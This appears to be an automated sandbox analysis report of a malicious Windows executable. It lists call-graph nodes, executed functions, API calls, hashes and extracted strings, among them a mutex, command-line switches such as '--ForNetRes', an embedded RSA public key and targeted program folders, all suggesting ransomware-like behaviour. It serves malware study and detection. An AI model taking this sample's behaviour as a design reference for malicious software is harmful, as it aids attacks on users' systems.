41087 f1ef45 lstrcpyW 41086->41087 41092 f1ef6a 41087->41092 41088 f1ed1f lstrcpyW 41090 f1ed43 lstrlenA 41088->41090 41088->41093 41091 f20c62 _malloc 58 API calls 41090->41091 41091->41093 41094 f13ff0 59 API calls 41092->41094 41093->41043 41093->41044 41093->41045 41093->41048 41093->41050 41093->41051 41093->41052 41093->41055 41093->41056 41093->41057 41093->41059 41093->41062 41093->41063 41093->41065 41093->41067 41093->41068 41093->41069 41093->41072 41093->41073 41093->41076 41093->41079 41093->41081 41093->41083 41093->41088 41093->41090 41096 f1ed68 MultiByteToWideChar lstrcpyW lstrlenW 41093->41096 41100 f1edc3 SHGetFolderPathA 41093->41100 41103 f20bed 58 API calls _free 41093->41103 41111 f0c500 SHGetFolderPathA 41093->41111 41147 f11b10 timeGetTime timeGetTime 41093->41147 41095 f1ef9f 41094->41095 41097 f12900 60 API calls 41095->41097 41096->41093 41098 f1edad lstrlenW 41096->41098 41099 f1efac lstrcpyW 41097->41099 41098->41093 41104 f1ee44 41098->41104 41099->41104 41100->41093 41102 f1edea PathAppendA DeleteFileA 41100->41102 41102->41093 41103->41093 41107 f0c734 41106->41107 41108 f0c6cc RegQueryValueExW 41106->41108 41107->41093 41109 f0c70c RegSetValueExW RegCloseKey 41108->41109 41110 f0c6fd RegCloseKey 41108->41110 41109->41107 41110->41093 41112 f0c525 41111->41112 41113 f0c52c PathAppendA 41111->41113 41112->41093 41114 f220b6 125 API calls 41113->41114 41115 f0c550 41114->41115 41116 f0c559 41115->41116 41154 f2387f 41115->41154 41116->41093 41118 f0c56c 41167 f23455 41118->41167 41120 f0c572 41180 f20cf4 41120->41180 41122 f0c57a 41123 f0c5a5 41122->41123 41124 f0c589 41122->41124 41125 f23a38 __fcloseall 83 API calls 41123->41125 41197 f222f5 41124->41197 41127 f0c5ab 41125->41127 41127->41093 41129 f23a38 __fcloseall 83 API calls 41130 f0c599 41129->41130 41130->41093 41344 f21ff2 41131->41344 41133 f220c6 41133->41093 41135 f22b0e _ungetc 41134->41135 41136 f22b44 41135->41136 41137 f22b2c 41135->41137 41138 f22b3c _ungetc 41135->41138 41139 f20e53 __lock_file 59 API calls 41136->41139 41140 f25208 ___crtsetenv 58 API calls 41137->41140 41138->41093 41142 f22b4a 41139->41142 41141 f22b31 41140->41141 41435 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41141->41435 41436 f229a9 78 API calls 6 library calls 41142->41436 41145 f22b5e 41437 f22b7c LeaveCriticalSection LeaveCriticalSection _fprintf 41145->41437 41148 f11b7f 41147->41148 41149 f11b2f 41147->41149 41148->41093 41149->41148 41150 f11b40 PeekMessageW 41149->41150 41152 f11b58 DispatchMessageW PeekMessageW 41149->41152 41150->41149 41151 f11b70 Sleep timeGetTime 41150->41151 41151->41148 41151->41150 41152->41149 41152->41151 41153->41063 41157 f2388b _ungetc 41154->41157 41155 f2389d 41158 f25208 ___crtsetenv 58 API calls 41155->41158 41156 f238c3 41159 f20e53 __lock_file 59 API calls 41156->41159 41157->41155 41157->41156 41160 f238a2 41158->41160 41162 f238c9 41159->41162 41212 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41160->41212 41200 f237f0 41162->41200 41166 f238ad _ungetc 41166->41118 41168 f23461 _ungetc 41167->41168 41169 f23473 41168->41169 41170 f23488 41168->41170 41171 f25208 ___crtsetenv 58 API calls 41169->41171 41172 f20e53 __lock_file 59 API calls 41170->41172 41173 f23478 41171->41173 41174 f2348e 41172->41174 41309 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41173->41309 41176 f230c5 __ftell_nolock 67 API calls 41174->41176 41177 f23499 41176->41177 41310 f234b9 LeaveCriticalSection LeaveCriticalSection _fprintf 41177->41310 41179 f23483 _ungetc 41179->41120 41181 f20d00 _ungetc 41180->41181 41182 f20d24 41181->41182 41183 f20d0e 41181->41183 41185 f2816b __fgetwc_nolock 58 API calls 41182->41185 41184 f25208 ___crtsetenv 58 API calls 41183->41184 41186 f20d13 41184->41186 41187 f20d2d 41185->41187 41311 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41186->41311 41189 f20e53 __lock_file 59 API calls 41187->41189 41190 f20d35 41189->41190 41191 f2836b __flush 78 API calls 41190->41191 41193 f20d41 41191->41193 41192 f20d1e _ungetc 41192->41122 41194 f2818f __write 64 API calls 41193->41194 41195 f20d8b 41194->41195 41312 f20dab LeaveCriticalSection LeaveCriticalSection _fprintf 41195->41312 41313 f22310 41197->41313 41199 f0c593 41199->41129 41201 f2380e 41200->41201 41202 f237fe 41200->41202 41205 f23824 41201->41205 41242 f230c5 41201->41242 41203 f25208 ___crtsetenv 58 API calls 41202->41203 41206 f23803 41203->41206 41207 f2836b __flush 78 API calls 41205->41207 41213 f238fa LeaveCriticalSection LeaveCriticalSection _fprintf 41206->41213 41208 f23837 41207->41208 41209 f2816b __fgetwc_nolock 58 API calls 41208->41209 41210 f23865 41209->41210 41214 f2818f 41210->41214 41212->41166 41213->41166 41215 f2819b _ungetc 41214->41215 41216 f281a8 41215->41216 41217 f281bf 41215->41217 41284 f251d4 58 API calls __getptd_noexit 41216->41284 41219 f2825e 41217->41219 41221 f281d3 41217->41221 41288 f251d4 58 API calls __getptd_noexit 41219->41288 41220 f281ad 41223 f25208 ___crtsetenv 58 API calls 41220->41223 41224 f281f1 41221->41224 41225 f281fb 41221->41225 41236 f281b4 _ungetc 41223->41236 41285 f251d4 58 API calls __getptd_noexit 41224->41285 41228 f3b134 ___lock_fhandle 59 API calls 41225->41228 41226 f281f6 41230 f25208 ___crtsetenv 58 API calls 41226->41230 41229 f28201 41228->41229 41231 f28227 41229->41231 41232 f28214 41229->41232 41233 f2826a 41230->41233 41237 f25208 ___crtsetenv 58 API calls 41231->41237 41271 f2827e 41232->41271 41289 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41233->41289 41236->41206 41239 f2822c 41237->41239 41238 f28220 41287 f28256 LeaveCriticalSection __unlock_fhandle 41238->41287 41286 f251d4 58 API calls __getptd_noexit 41239->41286 41243 f230d2 __ftell_nolock 41242->41243 41244 f23102 41243->41244 41245 f230ea 41243->41245 41247 f2816b __fgetwc_nolock 58 API calls 41244->41247 41246 f25208 ___crtsetenv 58 API calls 41245->41246 41248 f230ef 41246->41248 41249 f2310a 41247->41249 41307 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41248->41307 41251 f2818f __write 64 API calls 41249->41251 41252 f23126 41251->41252 41255 f23316 41252->41255 41256 f231a9 41252->41256 41269 f230fa 41252->41269 41253 f2a77e __ld12tod 6 API calls 41254 f23451 41253->41254 41254->41205 41257 f2331f 41255->41257 41261 f232d2 41255->41261 41259 f231cf 41256->41259 41256->41261 41258 f25208 ___crtsetenv 58 API calls 41257->41258 41258->41269 41259->41269 41308 f2f648 62 API calls 5 library calls 41259->41308 41263 f2818f __write 64 API calls 41261->41263 41261->41269 41262 f23208 41264 f23234 ReadFile 41262->41264 41262->41269 41265 f23383 41263->41265 41266 f23259 41264->41266 41264->41269 41268 f2818f __write 64 API calls 41265->41268 41265->41269 41267 f2818f __write 64 API calls 41266->41267 41270 f2326c 41267->41270 41268->41269 41269->41253 41270->41269 41290 f3b3f1 41271->41290 41273 f2828f 41274 f282a6 SetFilePointerEx 41273->41274 41275 f28297 41273->41275 41277 f282d2 GetLastError 41274->41277 41278 f282be SetFilePointerEx 41274->41278 41276 f25208 ___crtsetenv 58 API calls 41275->41276 41282 f2829c 41276->41282 41303 f251e7 58 API calls 3 library calls 41277->41303 41278->41277 41279 f282e1 41278->41279 41281 f282e7 SetFilePointerEx 41279->41281 41279->41282 41283 f25208 ___crtsetenv 58 API calls 41281->41283 41282->41238 41283->41282 41284->41220 41285->41226 41286->41238 41287->41236 41288->41226 41289->41236 41291 f3b411 41290->41291 41292 f3b3fc 41290->41292 41296 f3b436 41291->41296 41305 f251d4 58 API calls __getptd_noexit 41291->41305 41304 f251d4 58 API calls __getptd_noexit 41292->41304 41295 f3b401 41298 f25208 ___crtsetenv 58 API calls 41295->41298 41296->41273 41297 f3b440 41299 f25208 ___crtsetenv 58 API calls 41297->41299 41300 f3b409 41298->41300 41301 f3b448 41299->41301 41300->41273 41306 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41301->41306 41303->41282 41304->41295 41305->41297 41306->41300 41307->41269 41308->41262 41309->41179 41310->41179 41311->41192 41312->41192 41314 f2231c _ungetc 41313->41314 41315 f22332 _memset 41314->41315 41316 f2235f 41314->41316 41317 f22357 _ungetc 41314->41317 41320 f25208 ___crtsetenv 58 API calls 41315->41320 41318 f20e53 __lock_file 59 API calls 41316->41318 41317->41199 41319 f22365 41318->41319 41326 f22130 41319->41326 41322 f2234c 41320->41322 41340 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41322->41340 41329 f2214b _memset 41326->41329 41332 f22166 41326->41332 41327 f22156 41328 f25208 ___crtsetenv 58 API calls 41327->41328 41330 f2215b 41328->41330 41329->41327 41329->41332 41337 f221a6 41329->41337 41342 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41330->41342 41341 f22399 LeaveCriticalSection LeaveCriticalSection _fprintf 41332->41341 41333 f2b2f2 __filbuf 72 API calls 41333->41337 41334 f222b7 _memset 41338 f25208 ___crtsetenv 58 API calls 41334->41338 41335 f2816b __fgetwc_nolock 58 API calls 41335->41337 41337->41332 41337->41333 41337->41334 41337->41335 41339 f2b5c4 __read_nolock 70 API calls 41337->41339 41343 f29544 58 API calls 3 library calls 41337->41343 41338->41330 41339->41337 41340->41317 41341->41317 41342->41332 41343->41337 41347 f21ffe _ungetc 41344->41347 41345 f22010 41346 f25208 ___crtsetenv 58 API calls 41345->41346 41348 f22015 41346->41348 41347->41345 41349 f2203d 41347->41349 41380 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41348->41380 41351 f28df4 __getstream 61 API calls 41349->41351 41352 f22042 41351->41352 41353 f2204b 41352->41353 41354 f22058 41352->41354 41355 f25208 ___crtsetenv 58 API calls 41353->41355 41356 f22081 41354->41356 41357 f22061 41354->41357 41360 f22020 _ungetc @_EH4_CallFilterFunc@8 41355->41360 41363 f2b078 41356->41363 41359 f25208 ___crtsetenv 58 API calls 41357->41359 41359->41360 41360->41133 41372 f2b095 41363->41372 41364 f2b0a9 41365 f25208 ___crtsetenv 58 API calls 41364->41365 41366 f2b0ae 41365->41366 41385 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41366->41385 41368 f2b2ac 41382 f3fba6 41368->41382 41369 f2208c 41381 f220ae LeaveCriticalSection LeaveCriticalSection _fprintf 41369->41381 41372->41364 41379 f2b250 41372->41379 41386 f3fbc4 58 API calls __mbsnbcmp_l 41372->41386 41373 f2b216 41373->41364 41387 f3fcf3 65 API calls __mbsnbicmp_l 41373->41387 41375 f2b249 41375->41379 41388 f3fcf3 65 API calls __mbsnbicmp_l 41375->41388 41377 f2b268 41377->41379 41389 f3fcf3 65 API calls __mbsnbicmp_l 41377->41389 41379->41364 41379->41368 41380->41360 41381->41360 41390 f3fa8f 41382->41390 41384 f3fbbf 41384->41369 41385->41369 41386->41373 41387->41375 41388->41377 41389->41379 41392 f3fa9b _ungetc 41390->41392 41391 f3fab1 41393 f25208 ___crtsetenv 58 API calls 41391->41393 41392->41391 41395 f3fae7 41392->41395 41394 f3fab6 41393->41394 41408 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41394->41408 41401 f3fb58 41395->41401 41400 f3fac0 _ungetc 41400->41384 41410 f27970 41401->41410 41404 f3fb03 41409 f3fb2c LeaveCriticalSection __unlock_fhandle 41404->41409 41405 f3bac1 __wsopen_nolock 109 API calls 41406 f3fb92 41405->41406 41407 f20bed _free 58 API calls 41406->41407 41407->41404 41408->41400 41409->41400 41411 f27993 41410->41411 41412 f2797d 41410->41412 41411->41412 41415 f2799a ___crtIsPackagedApp 41411->41415 41413 f25208 ___crtsetenv 58 API calls 41412->41413 41414 f27982 41413->41414 41431 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 41414->41431 41417 f279a3 AreFileApisANSI 41415->41417 41418 f279b0 MultiByteToWideChar 41415->41418 41417->41418 41419 f279ad 41417->41419 41420 f279ca GetLastError 41418->41420 41421 f279db 41418->41421 41419->41418 41432 f251e7 58 API calls 3 library calls 41420->41432 41433 f28cde 58 API calls 2 library calls 41421->41433 41424 f2798c 41424->41404 41424->41405 41425 f279e3 41425->41424 41426 f279ea MultiByteToWideChar 41425->41426 41426->41424 41427 f27a00 GetLastError 41426->41427 41434 f251e7 58 API calls 3 library calls 41427->41434 41429 f27a0c 41430 f20bed _free 58 API calls 41429->41430 41430->41424 41431->41424 41432->41424 41433->41425 41434->41429 41435->41138 41436->41145 41437->41138 41438 f81920 41439 f2f7c0 __ftell_nolock 41438->41439 41440 f81943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 41439->41440 41441 f81a0b 41440->41441 41442 f819e2 GetProcAddress GetProcAddress 41440->41442 41443 f81aab 41441->41443 41446 f81a1b NetStatisticsGet 41441->41446 41442->41441 41444 f81acb 41443->41444 41445 f81ac4 FreeLibrary 41443->41445 41447 f81ad5 GetProcAddress GetProcAddress GetProcAddress 41444->41447 41475 f81b0d __ftell_nolock 41444->41475 41445->41444 41448 f81a69 NetStatisticsGet 41446->41448 41449 f81a33 __ftell_nolock 41446->41449 41447->41475 41448->41443 41450 f81a87 __ftell_nolock 41448->41450 41453 f5d550 101 API calls 41449->41453 41457 f5d550 101 API calls 41450->41457 41451 f81c1b 41454 f81c31 LoadLibraryA 41451->41454 41455 f81c24 41451->41455 41452 f81c14 FreeLibrary 41452->41451 41456 f81a5a 41453->41456 41459 f81c4a GetProcAddress GetProcAddress GetProcAddress 41454->41459 41460 f81d4b 41454->41460 41538 f549a0 13 API calls 4 library calls 41455->41538 41456->41448 41457->41443 41468 f81cac __ftell_nolock 41459->41468 41471 f81c84 __ftell_nolock 41459->41471 41462 f81d59 12 API calls 41460->41462 41463 f8223f 41460->41463 41461 f81c29 41461->41454 41461->41460 41464 f82233 FreeLibrary 41462->41464 41481 f81e5c 41462->41481 41526 f82470 41463->41526 41464->41463 41467 f81d3f FreeLibrary 41467->41460 41472 f81d03 __ftell_nolock 41468->41472 41483 f5d550 101 API calls 41468->41483 41469 f81b7c __ftell_nolock 41485 f5d550 101 API calls 41469->41485 41488 f81bee 41469->41488 41470 f8225b __ftell_nolock 41473 f5d550 101 API calls 41470->41473 41474 f5d550 101 API calls 41471->41474 41472->41467 41479 f5d550 101 API calls 41472->41479 41476 f82276 GetCurrentProcessId 41473->41476 41474->41468 41475->41469 41478 f5d550 101 API calls 41475->41478 41475->41488 41477 f8228f __ftell_nolock 41476->41477 41482 f5d550 101 API calls 41477->41482 41478->41469 41480 f81d3c 41479->41480 41480->41467 41481->41464 41486 f81ed9 CreateToolhelp32Snapshot 41481->41486 41484 f822aa 41482->41484 41483->41472 41487 f2a77e __ld12tod 6 API calls 41484->41487 41485->41488 41486->41464 41489 f81ef0 41486->41489 41490 f822ca 41487->41490 41488->41451 41488->41452 41491 f81f03 GetTickCount 41489->41491 41492 f81f15 Heap32ListFirst 41489->41492 41491->41492 41493 f82081 41492->41493 41498 f81f28 __ftell_nolock 41492->41498 41494 f8209d Process32First 41493->41494 41495 f82095 GetTickCount 41493->41495 41496 f8210a 41494->41496 41502 f820b4 __ftell_nolock 41494->41502 41495->41494 41497 f82118 GetTickCount 41496->41497 41511 f82120 __ftell_nolock 41496->41511 41497->41511 41498->41493 41505 f8204e Heap32ListNext 41498->41505 41506 f82066 GetTickCount 41498->41506 41510 f5d550 101 API calls 41498->41510 41515 f81ff1 GetTickCount 41498->41515 41520 f5d550 41498->41520 41500 f5d550 101 API calls 41500->41502 41501 f81f56 Heap32First 41501->41498 41502->41496 41502->41500 41507 f820fb GetTickCount 41502->41507 41503 f82196 41504 f821a4 GetTickCount 41503->41504 41517 f821ac __ftell_nolock 41503->41517 41504->41517 41505->41493 41505->41498 41506->41493 41506->41498 41507->41496 41507->41502 41508 f82219 41513 f82229 41508->41513 41514 f8222d CloseHandle 41508->41514 41509 f5d550 101 API calls 41509->41511 41512 f81fd9 Heap32Next 41510->41512 41511->41503 41511->41509 41518 f82187 GetTickCount 41511->41518 41512->41498 41513->41464 41514->41464 41515->41498 41516 f5d550 101 API calls 41516->41517 41517->41508 41517->41516 41519 f8220a GetTickCount 41517->41519 41518->41503 41518->41511 41519->41508 41519->41517 41521 f5d559 41520->41521 41523 f5d57d __ftell_nolock 41520->41523 41539 f6b5d0 101 API calls __except_handler4 41521->41539 41523->41501 41524 f5d55f 41524->41523 41540 f5a5e0 101 API calls __except_handler4 41524->41540 41527 f8247a __ftell_nolock 41526->41527 41528 f824c3 GetTickCount 41527->41528 41529 f82483 QueryPerformanceCounter 41527->41529 41530 f824d6 __ftell_nolock 41528->41530 41531 f82499 __ftell_nolock 41529->41531 41532 f82492 41529->41532 41533 f5d550 101 API calls 41530->41533 41534 f5d550 101 API calls 41531->41534 41532->41528 41535 f824ea 41533->41535 41536 f824b7 41534->41536 41537 f82244 GlobalMemoryStatus 41535->41537 41536->41528 41536->41537 41537->41470 41538->41461 41539->41524 41540->41523

                                                                                                        Executed Functions

                                                                                                        Function 00F19F90 Relevance: 169.6, APIs: 65, Strings: 31, Instructions: 1565COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F0CF10: _memset.LIBCMT ref: 00F0CF4A
                                                                                                          • Part of subcall function 00F0CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F0CF5F
                                                                                                          • Part of subcall function 00F0CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F0CFA6
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F19FC4
                                                                                                        • GetLastError.KERNEL32 ref: 00F19FD2
                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00F19FDA
                                                                                                        • GetLastError.KERNEL32 ref: 00F19FE4
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,007737D0,?), ref: 00F1A0BB
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1A0C2
                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00F1A161
                                                                                                          • Part of subcall function 00F124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F124FE
                                                                                                          • Part of subcall function 00F124E0: GetLastError.KERNEL32 ref: 00F12509
                                                                                                          • Part of subcall function 00F124E0: CloseHandle.KERNEL32 ref: 00F1251C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2957410896-1250862213
                                                                                                        • Opcode ID: febf7de6c19b89689b4e389547eb1e6ceda67945a2a5fc4cc536139239ad0642
                                                                                                        • Instruction ID: e2f7f2306942453b3014b3430aabdd7e328cebd00f8a65a1227e3e94bac42af7
                                                                                                        • Opcode Fuzzy Hash: febf7de6c19b89689b4e389547eb1e6ceda67945a2a5fc4cc536139239ad0642
                                                                                                        • Instruction Fuzzy Hash: 72D2D371604341ABD724EF24DC56BDB77E5BF94304F00091CF48587292EB79AA89EB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F81920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 606 f81920-f819e0 call f2f7c0 GetVersionExA LoadLibraryA * 3 609 f81a0b-f81a0d 606->609 610 f819e2-f81a05 GetProcAddress * 2 606->610 611 f81aba-f81ac2 609->611 612 f81a13-f81a15 609->612 610->609 613 f81acb-f81ad3 611->613 614 f81ac4-f81ac5 FreeLibrary 611->614 612->611 615 f81a1b-f81a31 NetStatisticsGet 612->615 616 f81b0d 613->616 617 f81ad5-f81b0b GetProcAddress * 3 613->617 614->613 618 f81a69-f81a85 NetStatisticsGet 615->618 619 f81a33-f81a5d call f2f7c0 call f5d550 615->619 620 f81b0f-f81b17 616->620 617->620 618->611 622 f81a87-f81aae call f2f7c0 call f5d550 618->622 619->618 624 f81c0a-f81c12 620->624 625 f81b1d-f81b23 620->625 622->611 627 f81c1b-f81c22 624->627 628 f81c14-f81c15 FreeLibrary 624->628 625->624 630 f81b29-f81b2b 625->630 632 f81c31-f81c44 LoadLibraryA 627->632 633 f81c24-f81c2b call f549a0 627->633 628->627 630->624 635 f81b31-f81b47 630->635 638 f81c4a-f81c82 GetProcAddress * 3 632->638 639 f81d4b-f81d53 632->639 633->632 633->639 652 f81b98-f81baa 635->652 653 f81b49-f81b5d 635->653 644 f81caf-f81cb7 638->644 645 f81c84 638->645 642 f81d59-f81e56 GetProcAddress * 12 639->642 643 f8223f-f82256 call f82470 GlobalMemoryStatus call f2f7c0 639->643 649 f81e5c-f81e63 642->649 650 f82233-f82239 FreeLibrary 642->650 669 f8225b-f822cd call f5d550 GetCurrentProcessId call f2f7c0 call f5d550 call f2a77e 643->669 647 f81cb9-f81cc0 644->647 648 f81d06-f81d08 644->648 658 f81c86-f81cac call f2f7c0 call f5d550 645->658 654 f81ccb-f81ccd 647->654 655 f81cc2-f81cc9 647->655 659 f81d0a-f81d3c call f2f7c0 call f5d550 648->659 660 f81d3f-f81d45 FreeLibrary 648->660 649->650 656 f81e69-f81e70 649->656 650->643 662 f81bb2-f81bb4 652->662 671 f81b8a-f81b8c 653->671 672 f81b5f-f81b84 call f2f7c0 call f5d550 653->672 654->648 661 f81ccf-f81cde 654->661 655->648 655->654 656->650 663 f81e76-f81e7d 656->663 658->644 659->660 660->639 661->648 681 f81ce0-f81d03 call f2f7c0 call f5d550 661->681 662->624 667 f81bb6-f81bca 662->667 663->650 668 f81e83-f81e8a 663->668 691 f81bfc-f81bfe 667->691 692 f81bcc-f81bf6 call f2f7c0 call f5d550 667->692 668->650 676 f81e90-f81e97 668->676 671->652 672->671 676->650 683 f81e9d-f81ea4 676->683 681->648 683->650 693 f81eaa-f81eb1 683->693 691->624 692->691 693->650 699 f81eb7-f81ebe 693->699 699->650 703 f81ec4-f81ecb 699->703 703->650 704 f81ed1-f81ed3 703->704 704->650 708 f81ed9-f81eea CreateToolhelp32Snapshot 704->708 708->650 711 f81ef0-f81f01 708->711 713 f81f03-f81f0f GetTickCount 711->713 714 f81f15-f81f22 Heap32ListFirst 711->714 713->714 715 f81f28-f81f2d 714->715 716 f82081-f82093 714->716 717 f81f33-f81f9d call f2f7c0 call f5d550 Heap32First 715->717 718 f8209d-f820b2 Process32First 716->718 719 f82095-f82097 GetTickCount 716->719 735 f81f9f-f81faa 717->735 736 f82015-f82060 Heap32ListNext 717->736 721 f8210a-f82116 718->721 722 f820b4-f820f5 call f2f7c0 call f5d550 718->722 719->718 723 f82118-f8211a GetTickCount 721->723 724 f82120-f82135 721->724 722->721 746 f820f7-f820f9 722->746 723->724 733 f82196-f821a2 724->733 734 f82137 724->734 737 f821ac-f821c1 733->737 738 f821a4-f821a6 GetTickCount 733->738 740 f82140-f82181 call f2f7c0 call f5d550 734->740 741 f81fb0-f81feb call f2f7c0 call f5d550 Heap32Next 735->741 736->716 743 f82062-f82064 736->743 753 f82219-f82227 737->753 754 f821c3-f82204 call f2f7c0 call f5d550 737->754 738->737 740->733 770 f82183-f82185 740->770 762 f81fed-f81fef 741->762 763 f8200f 741->763 747 f82079-f8207b 743->747 748 f82066-f82077 GetTickCount 743->748 746->722 752 f820fb-f82108 GetTickCount 746->752 747->716 747->717 748->716 748->747 752->721 752->722 759 f82229-f8222b 753->759 760 f8222d CloseHandle 753->760 754->753 774 f82206-f82208 754->774 759->650 760->650 766 f81ff1-f82002 GetTickCount 762->766 767 f82004-f8200d 762->767 763->736 766->763 766->767 767->741 767->763 770->740 772 f82187-f82194 GetTickCount 770->772 772->733 772->740 774->754 775 f8220a-f82217 GetTickCount 774->775 775->753 775->754
                                                                                                        APIs
                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00F81983
                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00F81994
                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00F819A1
                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00F819AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00F819E8
                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00F819FB
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00F81A2D
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00F81A81
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F81AC5
                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00F81ADB
                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00F81AEE
                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00F81B01
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F81C15
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00F81C36
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00F81C50
                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00F81C63
                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00F81C76
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F81D45
                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00F81D73
                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00F81D86
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00F81D99
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00F81DAC
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00F81DBF
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00F81DD2
                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00F81DE5
                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00F81DF8
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00F81E0B
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00F81E1E
                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00F81E31
                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00F81E44
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F81EDD
                                                                                                        • GetTickCount.KERNEL32 ref: 00F81F03
                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00F81F1A
                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00F81F95
                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,D1E38783), ref: 00F81FE3
